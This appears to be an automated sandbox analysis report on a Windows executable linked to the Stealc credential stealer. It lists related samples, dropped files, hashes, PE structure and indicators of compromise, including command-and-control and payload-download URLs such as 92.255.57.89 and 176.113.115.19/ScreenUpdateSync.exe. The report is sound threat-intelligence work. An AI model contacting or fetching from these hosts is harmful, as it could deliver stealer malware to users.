                                                  • 92.255.57.89/45c616e921a794b8.php
                                                  yZB8qfUJJu.exeGet hashmaliciousStealcBrowse
                                                  • 92.255.57.89/45c616e921a794b8.php
                                                  5gR5rEGCfw.exeGet hashmaliciousStealc, VidarBrowse
                                                  • 92.255.57.89/45c616e921a794b8.php
                                                  7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                  • 92.255.57.89/45c616e921a794b8.php
                                                  176.113.115.19ief722WreR.exeGet hashmaliciousStealcBrowse
                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                  7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                  • 176.113.115.19/ScreenUpdateSync.exe

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  post-to-me.comief722WreR.exeGet hashmaliciousStealcBrowse
                                                  • 104.21.56.70
                                                  7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                  • 104.21.56.70
                                                  YQ3PhY2Aeq.exeGet hashmaliciousStealc, VidarBrowse
                                                  • 104.21.56.70
                                                  6X4BIzTTBR.exeGet hashmaliciousStealcBrowse
                                                  • 172.67.179.207
                                                  vwkb5DQRAL.exeGet hashmaliciousStealc, VidarBrowse
                                                  • 104.21.56.70
                                                  IeccNv7PP6.exeGet hashmaliciousStealc, VidarBrowse
                                                  • 172.67.179.207
                                                  XOr3Kqyo9n.exeGet hashmaliciousStealcBrowse
                                                  • 172.67.179.207
                                                  0r9PL33C8E.exeGet hashmaliciousStealcBrowse
                                                  • 172.67.179.207
                                                  Pw2KHOL9Z8.exeGet hashmaliciousStealcBrowse
                                                  • 172.67.179.207
                                                  Tg3sk2wywR.exeGet hashmaliciousStealcBrowse
                                                  • 104.21.56.70

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CLOUDFLARENETUSJNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  • 104.21.16.1
                                                  http://enteolcl.top/Get hashmaliciousUnknownBrowse
                                                  • 104.21.112.1
                                                  ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                  • 104.21.64.208
                                                  751ietQPnX.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                  • 172.64.41.3
                                                  l92fYljXWF.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                  • 172.64.41.3
                                                  qxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                  • 172.64.41.3
                                                  taCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                  • 172.64.41.3
                                                  Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                  • 172.64.41.3
                                                  CMK7DB5YtR.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 104.21.64.1
                                                  XrQ8NgQHTn.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 104.21.64.1
                                                  TELSPRUief722WreR.exeGet hashmaliciousStealcBrowse
                                                  • 92.255.57.89
                                                  yZB8qfUJJu.exeGet hashmaliciousStealcBrowse
                                                  • 92.255.57.89
                                                  5gR5rEGCfw.exeGet hashmaliciousStealc, VidarBrowse
                                                  • 92.255.57.89
                                                  7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                  • 92.255.57.89
                                                  https://drive.google.com/file/d/1yoYdaJg2olHzjqEKXjn6nnXKPPak7HoL/view?usp=sharing_eil&ts=675747b9Get hashmaliciousUnknownBrowse
                                                  • 92.255.57.144
                                                  https://reviewgustereports.com/Get hashmaliciousCAPTCHA Scam ClickFix, XWormBrowse
                                                  • 92.255.57.155
                                                  S1NrYNOYhZ.exeGet hashmaliciousStealc, VidarBrowse
                                                  • 92.255.57.88
                                                  S4h5LcSjJc.exeGet hashmaliciousStealcBrowse
                                                  • 92.255.57.88
                                                  8z6iZ5YzKB.exeGet hashmaliciousStealcBrowse
                                                  • 92.255.57.88
                                                  sXWh51zcTv.exeGet hashmaliciousStealcBrowse
                                                  • 92.255.57.88
                                                  SELECTELRUief722WreR.exeGet hashmaliciousStealcBrowse
                                                  • 176.113.115.19
                                                  5gR5rEGCfw.exeGet hashmaliciousStealc, VidarBrowse
                                                  • 176.113.115.215
                                                  7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                  • 176.113.115.19
                                                  la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                  • 45.89.231.211
                                                  5EZLEXDveC.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                  • 176.113.115.163
                                                  teste.sh4.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                  • 45.138.214.123
                                                  xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                  • 176.124.33.0
                                                  YQ3PhY2Aeq.exeGet hashmaliciousStealc, VidarBrowse
                                                  • 176.113.115.37
                                                  442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                  • 109.234.156.179
                                                  442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                  • 109.234.156.179

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  37f463bf4616ecd445d4a1937da06e19ief722WreR.exeGet hashmaliciousStealcBrowse
                                                  • 172.67.179.207
                                                  REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                  • 172.67.179.207
                                                  Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                  • 172.67.179.207
                                                  ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  • 172.67.179.207
                                                  7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                  • 172.67.179.207
                                                  PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                  • 172.67.179.207
                                                  FPqVs6et5F.exeGet hashmaliciousUnknownBrowse
                                                  • 172.67.179.207
                                                  c2.htaGet hashmaliciousXWormBrowse
                                                  • 172.67.179.207
                                                  document.pif.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  • 172.67.179.207
                                                  lFxGd66yDa.exeGet hashmaliciousNetSupport RATBrowse
                                                  • 172.67.179.207

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_8DF0.tmp.exe_d9536d4adcc536ae2746a44a8bafff0a0b24d3_7dfd4564_f2e10ef5-7435-4a26-b432-5bc1d261d316\Report.wer

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):0.964913320555941
                                                  Encrypted:false
                                                  SSDEEP:192:DBajRj/0WHlFjucZrP2izuiFDZ24IO8U:DQjsWHlFjNFzuiFDY4IO8U
                                                  MD5:45D73F4AE335D6C49FA7411EDD67F546
                                                  SHA1:6B727C5008C24460131A956B054F649DECFF5C80
                                                  SHA-256:1997E812962AE5DF2F7ADA2925EEB002F3F9D7A6720F00029CF14B515EBCF744
                                                  SHA-512:57A4CFD26AF4351CA4DFB8837AC3ADDEE3AC62ED200D553EB3861F87E866F0924DC346BDE25A58F228DEDAD603D6ED002E80E1E8ED655FF9AE486F5ED3AE0889
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.2.7.1.4.2.9.4.9.6.7.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.2.7.1.4.3.5.2.7.8.0.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.2.e.1.0.e.f.5.-.7.4.3.5.-.4.a.2.6.-.b.4.3.2.-.5.b.c.1.d.2.6.1.d.3.1.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.e.9.e.0.f.4.-.c.8.7.8.-.4.8.4.0.-.9.e.b.4.-.c.a.c.6.d.f.b.7.a.b.c.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.D.F.0...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.0.0.-.0.0.0.1.-.0.0.1.4.-.b.5.9.2.-.8.2.2.7.2.d.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.6.e.c.4.4.b.4.c.5.b.1.6.0.5.9.7.6.d.b.3.9.3.e.4.e.5.9.c.f.d.d.0.0.0.0.1.5.0.6.!.0.0.0.0.9.a.5.7.c.0.a.e.8.6.4.0.c.a.e.d.5.1.0.1.3.7.2.1.4.7.b.7.3.c.8.7.d.e.a.4.b.2.d.a.!.8.D.F.0...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERA957.tmp.dmp

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 17:59:03 2024, 0x1205a4 type
                                                  Category:dropped
                                                  Size (bytes):107118
                                                  Entropy (8bit):1.6843245047812372
                                                  Encrypted:false
                                                  SSDEEP:384:DSEUp1nBAUiIE2CAox+QSn41B9iCw8Sao4Se5V9j0U49mch:DVmBriIEv+bS9iCSWtRch
                                                  MD5:8E1091D62796A050D4FE7034F34BADB6
                                                  SHA1:B71879B93DF62E6227428460613F6510D4A95898
                                                  SHA-256:AB6D9B3DA9CB47AA18D5A8DFCDA186BB917641DA7A9CD2758AC184DE4637C139
                                                  SHA-512:5AF6A9DEF437D7E61BFFAB2C8566B953F59E5031041789F4EB5610205CEC529BBFA32D0BCDBDF60EBB145B56B837FDBECB40198AB732C403933C404B5A403C5D
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:MDMP..a..... .......g.Xg.........................................B..........T.......8...........T............3..no..........D...........0 ..............................................................................eJ....... ......GenuineIntel............T...........T.Xg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERAADF.tmp.WERInternalMetadata.xml

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):8322
                                                  Entropy (8bit):3.6953867355424013
                                                  Encrypted:false
                                                  SSDEEP:192:R6l7wVeJXp6HMCO5qOe6Yq36jGgmfl7pDp89b9WsfQ/m:R6lXJ56Hvuqn6Yy6Cgmflo91fV
                                                  MD5:2AA22F50ACFBC0895F8B18EB33D31609
                                                  SHA1:B3C6946026D9D33DD82A51E42E97D192B9FEB39A
                                                  SHA-256:00DD9F05C68D77002FF9BBCB29AECA1B0B4A5DE693866BD34B4C39D0A9193316
                                                  SHA-512:5E9E5599BBEFE01989395B859F847019423E57D9713F9B0ADE8A19F1659F7618331B286F6FC2E17BD6F6B814AF2C920085C3EC0CBC2B08B39D6DD6A6157D3AC8
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.8.0.<./.P.i.

                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB0F.tmp.xml

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4575
                                                  Entropy (8bit):4.445403138854711
                                                  Encrypted:false
                                                  SSDEEP:48:cvIwWl8zsQiJg77aI9IbWpW8VYvYm8M4JBeFU+q8uMHJxzhfd:uIjfQwI7yq7V/JpqHzhfd
                                                  MD5:3C24856C4FBA43124968C2DD0C2708B7
                                                  SHA1:30CC262EA4125F2C1807E3123FE4324825A8A8B2
                                                  SHA-256:DF33D644525A89F46938D6DD385E95310D069900E91704DC9AD6FBD7A853E2E8
                                                  SHA-512:9DA8CE70A2BC0F5095ED840D35F9D0C414410608AB1CD06B8E3A400D64712BC1A3A20D7A8867AEFDFE354574FAFE93B3EAF79FCEE97370A96BFD992C9C84652B
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="625501" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\ssB9bjDQPf.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):304640
                                                  Entropy (8bit):6.2361529050834195
                                                  Encrypted:false
                                                  SSDEEP:6144:N6peExujyYGuewLbCDGwCpBlkvbZvxRC8hw:vpGue+SGDqvbZvxA8
                                                  MD5:5DE218396F8C0A36CEE31B8EE4FD0BFE
                                                  SHA1:9A57C0AE8640CAED5101372147B73C87DEA4B2DA
                                                  SHA-256:84B4EDA5D456A2C49D117A0B99BC2ED03044EAA144EB5F6C28A248E673E406DB
                                                  SHA-512:82F557E91F94A2EC8DEE5B32E21B07BCE01425EA72FA02DED984E5CDD98019C6028444F3CB10332661A1E8BD3A90EDCD566B602CAC03B94CCD1F276E4C59553F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yg....{...{...{..T....{..T....{..T..E.{.:.....{...z.t.{..T....{..T....{..T....{.Rich..{.........................PE..L....mCf.....................$?...................@.......................... B......N......................................D...<.....@.."..............................................................................`............................text............................... ..`.rdata..\ ......."..................@..@.data....=..0...l..................@....rsrc...."....@..$..................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\ssB9bjDQPf.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):304640
                                                  Entropy (8bit):6.2361529050834195
                                                  Encrypted:false
                                                  SSDEEP:6144:N6peExujyYGuewLbCDGwCpBlkvbZvxRC8hw:vpGue+SGDqvbZvxA8
                                                  MD5:5DE218396F8C0A36CEE31B8EE4FD0BFE
                                                  SHA1:9A57C0AE8640CAED5101372147B73C87DEA4B2DA
                                                  SHA-256:84B4EDA5D456A2C49D117A0B99BC2ED03044EAA144EB5F6C28A248E673E406DB
                                                  SHA-512:82F557E91F94A2EC8DEE5B32E21B07BCE01425EA72FA02DED984E5CDD98019C6028444F3CB10332661A1E8BD3A90EDCD566B602CAC03B94CCD1F276E4C59553F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yg....{...{...{..T....{..T....{..T..E.{.:.....{...z.t.{..T....{..T....{..T....{.Rich..{.........................PE..L....mCf.....................$?...................@.......................... B......N......................................D...<.....@.."..............................................................................`............................text............................... ..`.rdata..\ ......."..................@..@.data....=..0...l..................@....rsrc...."....@..$..................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:MS Windows registry file, NT/2000 or above
                                                  Category:dropped
                                                  Size (bytes):1835008
                                                  Entropy (8bit):4.372053185616116
                                                  Encrypted:false
                                                  SSDEEP:6144:KFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNciL:iV1QyWWI/glMM6kF7+q
                                                  MD5:23EB1B9005CF39A0109813491986654B
                                                  SHA1:AB13D6B59C0803D8CF9231C2A4093BA4909A3445
                                                  SHA-256:653B929EBB789790A6A5E7836563700173C1F67741104D08E4D1863FFE52DE50
                                                  SHA-512:A9877B8940490FF226D887453310DE6C553F1D3995C978DB4D6DF0155319129E00F88D3ED7EAC4D72AC5916180D1FB641B0017A38C4EF9CEF25EB5E4CE72DAD1
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm:.b2-K................................................................................................................................................................................................................................................................................................................................................u.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):6.9640815832629865
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.55%
                                                  • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:ssB9bjDQPf.exe
                                                  File size:430'592 bytes
                                                  MD5:26ceb3d9dcc1821192b39eea6832d51d
                                                  SHA1:d22dae62f3d122acaec58a03550d5d99a9b7cfb4
                                                  SHA256:fe7c9c900df7c51f53243053dcf41ee781d284206742952aea704735d8d4a198
                                                  SHA512:2dd773c7afa7cb46c1f94d195e9b542a5e8ec150b608d8dcde0aa60f7aff15ea0fced33fe647519cca91ada905dce14576a8b2b84bc0c9ecfc6f362a3cdccda8
                                                  SSDEEP:12288:+kmdgMiHbQuCIu+Sp+tXcyZpCxFzR7DB5:zmAHq+Sp+RbpCrF7V
                                                  TLSH:6F94CE1175F48439EFF68B714BB0C2A41A7BBC626B34918E7A953A5F19332E08E71703
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yg....{...{...{..T....{..T....{..T..E.{.:.....{...z.t.{..T....{..T....{..T....{.Rich..{.........................PE..L...Z..d...

                                                  File Icon

                                                  Icon Hash:46c7c30b0f4e8d19

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x4014f7
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x64B7CC5A [Wed Jul 19 11:43:22 2023 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:0
                                                  File Version Major:5
                                                  File Version Minor:0
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:0
                                                  Import Hash:d3b3bde725d7f4017897955975268d5d

                                                  Entrypoint Preview

                                                  Instruction
                                                  call 00007F9804B31240h
                                                  jmp 00007F9804B2E73Dh
                                                  mov edi, edi
                                                  push ebp
                                                  mov ebp, esp
                                                  sub esp, 00000328h
                                                  mov dword ptr [00454878h], eax
                                                  mov dword ptr [00454874h], ecx
                                                  mov dword ptr [00454870h], edx
                                                  mov dword ptr [0045486Ch], ebx
                                                  mov dword ptr [00454868h], esi
                                                  mov dword ptr [00454864h], edi
                                                  mov word ptr [00454890h], ss
                                                  mov word ptr [00454884h], cs
                                                  mov word ptr [00454860h], ds
                                                  mov word ptr [0045485Ch], es
                                                  mov word ptr [00454858h], fs
                                                  mov word ptr [00454854h], gs
                                                  pushfd
                                                  pop dword ptr [00454888h]
                                                  mov eax, dword ptr [ebp+00h]
                                                  mov dword ptr [0045487Ch], eax
                                                  mov eax, dword ptr [ebp+04h]
                                                  mov dword ptr [00454880h], eax
                                                  lea eax, dword ptr [ebp+08h]
                                                  mov dword ptr [0045488Ch], eax
                                                  mov eax, dword ptr [ebp-00000320h]
                                                  mov dword ptr [004547C8h], 00010001h
                                                  mov eax, dword ptr [00454880h]
                                                  mov dword ptr [0045477Ch], eax
                                                  mov dword ptr [00454770h], C0000409h
                                                  mov dword ptr [00454774h], 00000001h
                                                  mov eax, dword ptr [00452004h]
                                                  mov dword ptr [ebp-00000328h], eax
                                                  mov eax, dword ptr [00452008h]
                                                  mov dword ptr [ebp-00000324h], eax
                                                  call dword ptr [000000B4h]

                                                  Rich Headers

                                                  Programming Language:
                                                  • [C++] VS2008 build 21022
                                                  • [ASM] VS2008 build 21022
                                                  • [ C ] VS2008 build 21022
                                                  • [IMP] VS2005 build 50727
                                                  • [RES] VS2008 build 21022
                                                  • [LNK] VS2008 build 21022

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x508440x3c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x42e0000x12210.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x505080x40.rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x4f0000x160.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x4db1c0x4dc004ed51016bf626d0128c45006d30110f6False0.8527400271302251data7.554689479421369IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x4f0000x205c0x2200fd2173179414cfe0c1a1fc5fef8d0219False0.36121323529411764data5.415478136885594IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x520000x3db0d80x6c00703a7fd3a4a0188e14acaac8089ab34eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x42e0000x122100x12400ebfb4a524e7a64507198814607ca0913False0.515451091609589data5.465733474606782IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_CURSOR0x4391a80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                  RT_CURSOR0x4392d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                  RT_CURSOR0x43b8a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                  RT_ICON0x42e6f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SyriacSyriac0.357409381663113
                                                  RT_ICON0x42f5980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SyriacSyriac0.5058664259927798
                                                  RT_ICON0x42fe400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SyriacSyriac0.5829493087557603
                                                  RT_ICON0x4305080x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SyriacSyriac0.6184971098265896
                                                  RT_ICON0x430a700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SyriacSyriac0.35201688555347094
                                                  RT_ICON0x431b180x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SyriacSyriac0.3471311475409836
                                                  RT_ICON0x4324a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SyriacSyriac0.399822695035461
                                                  RT_ICON0x4329700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSyriacSyriac0.8384861407249466
                                                  RT_ICON0x4338180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSyriacSyriac0.8628158844765343
                                                  RT_ICON0x4340c00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSyriacSyriac0.7966589861751152
                                                  RT_ICON0x4347880x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSyriacSyriac0.8432080924855492
                                                  RT_ICON0x434cf00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SyriacSyriac0.8053941908713693
                                                  RT_ICON0x4372980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SyriacSyriac0.8330206378986866
                                                  RT_ICON0x4383400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304SyriacSyriac0.8442622950819673
                                                  RT_ICON0x438cc80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024SyriacSyriac0.8599290780141844
                                                  RT_DIALOG0x43c9200x84data0.7651515151515151
                                                  RT_STRING0x43c9a80x42cdata0.45318352059925093
                                                  RT_STRING0x43cdd80x122data0.5206896551724138
                                                  RT_STRING0x43cf000x7c0data0.4264112903225806
                                                  RT_STRING0x43d6c00x768data0.4272151898734177
                                                  RT_STRING0x43de280x8e4data0.4147627416520211
                                                  RT_STRING0x43e7100x728data0.4268558951965066
                                                  RT_STRING0x43ee380x78adata0.4227979274611399
                                                  RT_STRING0x43f5c80x79adata0.41778006166495374
                                                  RT_STRING0x43fd680x4a6data0.4588235294117647
                                                  RT_GROUP_CURSOR0x43b8800x22data1.088235294117647
                                                  RT_GROUP_CURSOR0x43c7500x14data1.25
                                                  RT_GROUP_ICON0x4391300x76dataSyriacSyriac0.6779661016949152
                                                  RT_GROUP_ICON0x4329080x68dataSyriacSyriac0.7115384615384616
                                                  RT_VERSION0x43c7680x1b8COM executable for DOS0.5681818181818182

                                                  Imports

                                                  DLLImport
